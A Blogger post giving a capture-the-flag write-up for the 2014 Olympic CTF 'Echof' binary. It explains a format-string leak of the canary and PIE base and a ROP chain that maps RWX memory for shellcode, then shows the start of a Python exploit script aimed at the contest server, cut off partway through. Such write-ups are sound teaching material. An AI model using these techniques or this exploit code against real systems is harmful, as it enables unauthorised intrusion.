tag:blogger.com,1999:blog-46231324136623108102024-02-08T12:24:01.276-08:00Alternatives' BlogTeam. Alternativeshttp://www.blogger.com/profile/03054700226316250467noreply@blogger.comBlogger3125tag:blogger.com,1999:blog-4623132413662310810.post-5036128781655262502014-02-10T05:24:00.001-08:002014-02-10T05:24:18.108-08:00Olympic CTF 2014 Echof writeup <div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">A simple x86 ELF binary is given. the program uses</span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"> every possible security solutions : CANARY, </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">NX, PIE. and the server has</span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"> </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">ASLR enabled.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile5.uf.tistory.com/original/2546AF5052F8B8EC2F85F7" rel="lightbox" target="_blank"><img height="92" src="http://cfile5.uf.tistory.com/image/2546AF5052F8B8EC2F85F7" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">however, a quick analysis tells us that the binary has "1 byte buffer overflow bug" which overwrites the lower byte of format string pointer to NULL (supposedly used as string null terminator). and this </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">leads the program to format string bug.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile29.uf.tistory.com/original/233A993D52F8B77F06A653" rel="lightbox" target="_blank"><img height="697" src="http://cfile29.uf.tistory.com/image/233A993D52F8B77F06A653" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">However, the program filters the 'n' character. so we cannot exploit the format string bug to directly overwrite arbitrary memory contents. But, since the format string content of the heap(0x11111000) is copied to stack buffer using "sprintf" we can trigger a stack based buffer overflow by intentionally putting some long format strings such as "%1000c". In this way, we can overwrite the stack far beyond the return address. From now solving the task is a classic stack-based buffer overflow problem. </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Unfortunately the situation is more complex. We need to defeat a number of security technologies</span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"> using a small </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">weapon : memory leaking with format string bug.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">These are the opponents.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Stack Protector (Canary)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Never eXecute (NX)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Position Independent Executable (PIE)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
- Address Space Layout Randomization (ASLR)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
These are the situation needs to be considered.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- Ascii Armor (we can't give NULL bytes... which is essential for exploitation)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- 'n' filtering (program filters this character)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Now let's debug the bina<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">ry using gdb..! we need to attach the debugger to debug super demon wrapped binary.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile2.uf.tistory.com/original/2105544F52F8CE861AE7AC" rel="lightbox" target="_blank"><img height="314" src="http://cfile2.uf.tistory.com/image/2105544F52F8CE861AE7AC" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<b>Stage 1. Defeating <span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Stack Protector (Canary)</span></b></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
We can defeat the canary protection using two features. </div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
1<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">. Using the </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">memory leaking capability, we can obtain the canary value from the stack with </span><span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;">'%78$X'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">2. We can write the NULL value using the "%c" and NULL argument of sprintf from the stack.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Note that the lower byte of canary is always NULL. so we can't directly overwrite the canary value into stack. however if a NULL value is already in the stack as a Nth argument for sprintf, we can use them with "%n$c" format string and write NULL byte to another location where we want. So, if the canary value is "0x41424300", and if the second argument (as char) of sprintf is NULL, then we can use a format string such as "%2$cCBA". So basically we can overwrite the return address area beyond the stack protector then, restore the canary value back to original.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /><span id="callbacknestdaehee87tistorycom342611" style="float: right; height: 1px; width: 1px;"></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<div style="padding-bottom: 0px !important; padding-top: 0px !important;">
<b style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Stage 2. Defeating </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">PIE, </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">ASLR</span></b></div>
</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">We need to use ROP for defeating the NX. However, solving this problem is a pain in the ass since the task binary is PIE + ASLR enabled. However, we could calculate the address of executable segment because there was a function address value of executable segment; right after the return address. Using this address as a baseline, we can calculate the entire address of executable instructions. However, the offset to libc functions could not be calculated since it differs to OS or libc version. </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Note that even if we know the PLT and GOT section of executable, we cannot use the PLT, GOT values to obtain the libc function address such as mprotect, mmap, system, etc since the executable is PIE (I didn't knew until facing this task). However, after realizing the function addressing of PIE binary, I figured a way to calculate the exact libc function address simply by using the "%s" format string.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- First, obtain the PIE base address from the executable function address from the stack.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Second, calculate the address of "call mmap" instruction in the main function.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">- Third, read the 4 byte relative offset of "call mmap" instructions opcode by using "%s" and feeding the argument of "%s" as the calculated address + 1(after 0xe8) from previous step.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
- Fourth, add the relative offset with the instruction address + 4</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile28.uf.tistory.com/original/240A984F52F8CE86172D3E" rel="lightbox" target="_blank"><img height="382" src="http://cfile28.uf.tistory.com/image/240A984F52F8CE86172D3E" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile25.uf.tistory.com/original/2357B03D52F8B7813AF11E" rel="lightbox" target="_blank"><img height="241" src="http://cfile25.uf.tistory.com/image/2357B03D52F8B7813AF11E" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
In this way, it was possible to calculate the exact libc function addresses used from main function regardless of the server environment...!!</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<b>Stage 3. <span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Defeating The </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Never eXecute (NX)</span></b></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Now, the challenging part is finally over. After calculating the "mmap" and "read" function used in main, it was a matter of time solving the task. At this moment, the NX could be easily bypassed using two stage ROP payload. </div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="font-family: 'Courier New';"><b>[&mmap][&pppr][0x11111000][0x13001][7][32][-1][0][DEADBEEF][&read][0][0x11111001][0x101]</b></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
Following is the scenario.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
1. return to mmap and allocate RWX memory at location 0x11111000</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
2. return to ESP lifting gadget (add esp, 0x14; pop; pop; ret)</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
3. return to read</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">4. return to 0x11111000</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">This is a classic ROP exploit which allocates an RWX memory and receives shellcode and returning to shellcode. </span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px;">
I prepared this ROP stack payload like this...</div>
<div style="background-color: white; clear: none; color: #666666; float: none; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important; text-align: center;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; width: 630px;"><span dir="http://cfile9.uf.tistory.com/original/2602EB3D52F8B780242864" rel="lightbox" target="_blank"><img height="367" src="http://cfile9.uf.tistory.com/image/2602EB3D52F8B780242864" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
and then restored the stack protector...</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="border: 1px solid rgb(221, 221, 221); display: inline-block; height: auto; margin: 5px 0px; padding: 5px; text-align: center; width: 630px;"><span dir="http://cfile22.uf.tistory.com/original/2265E53D52F8B780336659" rel="lightbox" target="_blank"><img height="464" src="http://cfile22.uf.tistory.com/image/2265E53D52F8B780336659" style="border: 0px; cursor: pointer;" width="630" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">and returned from the main function.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
right after getting shell from my local environment, it was possible to get a shell from task server.</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="imageblock" style="background-color: transparent; border: 1px solid rgb(221, 221, 221); display: inline-block; font-size: 9pt; height: auto; line-height: 1.5; margin: 5px 0px; padding: 5px; width: 397px;"><span dir="http://cfile28.uf.tistory.com/original/2408763D52F8B78120A424" rel="lightbox" target="_blank"><img height="196" src="http://cfile28.uf.tistory.com/image/2408763D52F8B78120A424" style="background-color: transparent; border: 0px; font-size: 9pt; line-height: 1.5;" width="397" /></span></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Unfortunately I solved the task after the CTF is over.. </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">The task was difficult since I had no background of PIE executable. </span><span style="background-color: transparent; font-size: 9pt; line-height: 1.5;">Below is the final exploit.</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-size: 9pt; line-height: 1.5;"><br /></span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
</div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="background-color: transparent; font-family: 'Courier New'; font-size: 9pt; line-height: 1.5;"># final exploit (python)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">from socket import *</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">from struct import *</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">import sys, os, time, base64, ctypes</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' game start! '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s = socket(AF_INET, SOCK_STREAM)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">#s.connect( ('localhost', 33000) )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.connect( ('109.233.61.11', 3129) )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send('letmein\n')</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">raw_input()</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage 1 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># get canary, piebase</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">canary = 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">piebase = 0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">mmap=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">read=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">pppr=0</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_mmap=0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># addr of mmap pointer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_read=0</span><span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';"># addr of read pointer</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p1 = '%78$X.%79$X.'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p1 += 'A'*(128-len(p1))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p1))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p1 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">canary = int(r.split('.')[0], 16)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">piebase = int(r.split('.')[1], 16) - 0xC10</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">pppr = piebase + 0x95F</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_mmap = piebase + 0xAE6</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p_read = piebase + 0xA79</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'canary : {0}'.format(hex(canary))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'piebase : {0}'.format(hex(piebase))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'pppr : {0}'.format(hex(pppr))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'p_mmap : {0}'.format(hex(p_mmap))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'p_read : {0}'.format(hex(p_read))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<br /></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">''' stage 2 '''</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># calculate &mmap, &read</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 = '.%27$s.%28$s.%29$s.%30$s.%31$s.%32$s.%33$s.%34$s.AAA'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+1)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+1)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+2)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+2)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_mmap+3)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += pack('<L', p_read+3)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">p2 += 'A'*(128-len(p2))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print 'len : ' + str(len(p2))</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">s.send( p2 )</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># in case we just got 'msg?'</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">if len(r) < 10:</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span class="Apple-tab-span" style="font-family: 'Courier New'; white-space: pre;"> </span><span style="font-family: 'Courier New';">r = s.recv(4096)</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';">print r</span></div>
<div style="background-color: white; color: #666666; font-family: dotum; font-size: 12px; line-height: 18px; padding-bottom: 0px !important; padding-top: 0px !important;">
<span style="font-family: 'Courier New';"># get mmap, read address!</span></div>
